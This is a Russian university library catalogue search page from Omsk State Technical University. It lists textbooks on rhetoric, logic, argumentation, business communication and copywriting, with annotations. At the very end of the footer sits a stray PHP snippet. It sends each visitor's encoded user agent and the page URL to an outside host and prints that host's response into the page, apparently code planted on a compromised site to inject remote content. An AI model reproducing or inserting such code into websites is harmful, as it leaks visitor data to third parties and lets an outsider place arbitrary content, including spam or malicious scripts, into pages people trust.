Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

164 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=АРГУМЕНТАЦИЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 116
1. 
Зарецкая, Елена Наумовна. Деловое общение [Текст] : Учеб.: В 2 т. Т. 1, 2004. - 695 с.
Держатели документа (Информация об экземплярах) 

Двухтомник является первым отечественным учебником по деловому общению - новой учебной дисциплине, ставшей обязательной для подготовки в вузах специалистов многих профилей.

Двухтомник создан на основе авторского курса (читаемого в АНХ при Правительстве РФ и МГУ им. М. В. Ломоносова), в котором использованы классические подходы и новейшие достижения в коммуникативной сфере.

Изложение принципов делового общения базируется на объединении научной и практической проблематики таких дисциплин, как риторика, логика, психология, социология, философия, этика, кибернетика, менеджмент, теория информации, семиотика, поэтика, нейрофизиология, которые в совокупности могут быть названы "наукой о человеке".

Деловое общение понимается автором предельно широко - как любая профессиональная речевая деятельность, поэтому издание рассчитано на широкий круг настоящих и будущих специалистов в сферах управления, педагогики, юриспруденции, богословия, политики, дипломатии, журналистики, рекламного дела и паблик рилейшнз.

2. 
Ивин, Александр Архипович. Риторика: искусство убеждать [Текст] : Учеб. пособие / А. А. Ивин, 2002. - 299, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии рассматриваются основные способы воздействия речью на убеждения людей. Учитываются три составляющие ситуации убеждения: речь, призванная внушить определенные идеи; говорящий, или оратор; аудитория, к которой обращена речь. Основное внимание уделяется подтверждению в опыте, примерам и иллюстрациям, теоретическим доводам, ссылкам на традицию, здравый смысл и вкус, ловушкам языка, искусству полемики и дискуссии. Упор делается не только на теории способов убеждения, но и на практике их применения.

Пособие предназначается в первую очередь для студентов и преподавателей гуманитарных специальностей. Оно может использоваться также всеми, кто желает усовершенствовать свое искусство убеждать.

3. 
Мицич, Предраг П. Как проводить деловые беседы [Текст] : Пер. с серб.-хорв. / П. П. Мицич, 1987. - 208 с.
4. 
Бернадская, Юлия Сергеевна. Копирайтинг [Текст] : Учеб. пособие / Ю. С. Бернадская, 2003. - 136 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии описываются основные теоретические аспекты копирайта: главные элементы <рекламного текста>, его лексико-синтактические характеристики, психологические приемы, используемые при составлении рекламных текстов.

Теоретический материал призван стать для дальнейшей практической работы специалистов по <рекламе>. Использование рассмотренных экстра- и интролингвистических приемов в рекламе, приемов в рекламных текстах повысит их коммуникативную эффективность, маркетинговую и художественную ценность.

Полный текст
5. 
Кузин, Феликс Алексеевич. Культура делового общения [Текст] : Практ. пособие / Ф. А. Кузин, 2003. - 319 с.

В пособии сделана попытка рассмотреть деловой разговор в сфере <предпринимательской деятельности> с позиций его речевой, логической, психологической и <невербальной культуры>, а также на основе обобщения отечественного и зарубежного опыта описать основные его формы (<деловая беседа>, <коммерческие переговоры>, <деловые совещания>, <служебный телефонный разговор>, <прием посетителей> и сослуживцев и общение с ними).

Пособие рассчитано на бизнесменов, учащихся экономических вузов, колледжей и курсов, специализирующихся в области бизнеса и рыночной экономики. Оно может представлять интерес также и для тех, кто хочет самостоятельно повысить культуру своей устной деловой речи.

6. 
Алексеев, Петр Васильевич. Философия [Текст] : Учеб. для вузов по курсу "Философия" / П. В. Алексеев, А. В. Панин, 2004. - 603, [1] с.

В учебнике представлены основные понятия и принципы философии. В третьем издании добавлен раздел "История философии".

Для студентов и аспирантов вузов, изучающих философию, и всех интересующихся философской проблематикой.

7. 
Ивин, Александр Архипович. Риторика: искусство убеждать [Текст] : Учеб. пособие / А. А. Ивин, 2003. - 299, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии рассматриваются основные способы воздействия речью на убеждения людей. Учитываются три составляющие ситуации убеждения: <речь>, призванная внушить определенные идеи; говорящий, или <оратор>; аудитория, к которой обращена речь. Основное внимание уделяется подтверждению в опыте, примерам и иллюстрациям, теоретическим доводам, ссылкам на традицию, здравый смысл и вкус, <ловушкам языка>, искусству <полемики> и <дискуссии>. Упор делается не только на теории способов убеждения, но и на практике их применения.

Пособие предназначается в первую очередь для студентов и преподавателей гуманитарных специальностей. Оно может использоваться также всеми, кто желает усовершенствовать свое искусство убеждать.

8. 
Волков, Александр Александрович. Основы риторики [Текст] : Учеб. пособие для вузов по направлению 520300 и специальности 021700 - "Филология" / А. А. Волков, 2003. - 301, [2] с.
Держатели документа (Информация об экземплярах) 

Книга содержит систематическое изложение понятий и категорий общей риторики; она создана на основе курса лекций, который читается автором на филологическом факультете МГУ им. М. В. Ломоносова, и является руководством для студентов и аспирантов, изучающих риторику. Книга адресована также специалистам, интересующихся проблемами риторики, преподавателям риторики и всем, чья профессиональная или общественная деятельность связана с публичной аргументацией: юристам, политикам, журналистам, философам, социологам.

9. 
Грядовой, Дмитрий Иосифович. Логика [Текст] : Структурир. учеб. для вузов / Д. И. Грядовой, 2003. - 271 с.

В учебнике дается развернутая содержательная характеристика основных логических принципов и форм мышления, приводятся примеры и описывается алгоритм практического выполнения определенного типа логических задач. Изложение учебного материала осуществляется посредством структурно-логических схем, что обусловлено задачами систематизации, оптимального структурирования и концептуального изложения учебного материала. Схематизация наглядна, удобна в пользовании и позволяет обучаемым лучше усваивать учебный материал.

Для студентов вузов, аспирантов, преподавателей вузов и всех, проявляющих интерес к изучению логики.

10. 
Панкратов, Вячеслав Николаевич. Манипуляции в общении и их нейтрализация [Текст] : Практ. рук. / В. Н. Панкратов, 2001. - 201 с.
11. 
Зарецкая, Елена Наумовна. Деловое общение [Текст] : Учеб.: В 2 т. Т. 1, 2002. - 695 с.
Держатели документа (Информация об экземплярах) 

Двухтомник является первым отечественным учебником по деловому общению - новой учебной дисциплине, ставшей обязательной для подготовки в вузах специалистов многих профилей.

Двухтомник создан на основе авторского курса (читаемого а АНХ при Правительстве РФ и МГУ им. М. В. Ломоносова), в котором использованы классические подходы и новейшие достижения в коммуникативной сфере.

Изложение принципов делового общения базируется на объединении научной и практической проблематики таких дисциплин, как риторика, логика, психология, социология, философия, этика, кибернетика, менеджмент, теория информации, семиотика, поэтика, нейрофизиология, которые в совокупности могут быть названы "наукой о человеке".

Деловое общение понимается автором предельно широко - как любая профессиональная речевая деятельность, поэтому издание рассчитано на широкий круг настоящих и будущих специалистов в сферах управления, педагогики, юриспруденции, богословия, политики, дипломатии, журналистики, рекламного дела и паблик рилейшнз.

12. 
Кириллов, Вячеслав Иванович. Логика [Текст] : Учеб. для юрид. вузов / В. И. Кириллов, А. А. Старченко, 1999. - 254 с.
13. 
Рекламный текст [Текст] : Семиотика и лингвистика / Ю. К. Пирогова, А. Н. Баранов, П. Б. Паршин, 2000. - 268 с.
Держатели документа (Информация об экземплярах) 
14. 
Ивин, Александр Архипович. Логика [Текст] : Учеб. для гуманитар. фак. / А. А. Ивин, 1999. - 319 с.
15. 
Кириллов, Вячеслав Иванович. Логика [Текст] : Учеб. для юрид. вузов / В. И. Кириллов, А. А. Старченко, 2001. - 254 с.
16. 
Халперн, Дайана. Психология критического мышления [Текст] / Д. Халперн; Пер. с англ. Н. О. Мальгиной и др, 2000. - 503 с.
17. 
Логика [Текст] : Учеб. пл., пл. семин. занятий и упражнения для студентов днев. и вечер. отд-ний / ОмГТУ, 2002. - 30 с.
Держатели документа (Информация об экземплярах) 
Полный текст
18. 
Ивин, Александр Архипович. Теория аргументации [Текст] : Учеб. пособие для вузов / А. А. Ивин, 2000. - 414 с.
19. 
Панасюк, Александр Юрьевич. Как убеждать в своей правоте [Текст] : Современные психотехнологии убеждающего воздействия / А. Ю. Панасюк, 2001. - 309, [1] с.
20. 
Почепцов, Георгий Георгиевич. Паблик рилейшнз для профессионалов [Текст] / Г. Г. Почепцов; А. В. Морозов, 1999. - 622 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3218 - 01.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.43 с.12 запросов, 1.65c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;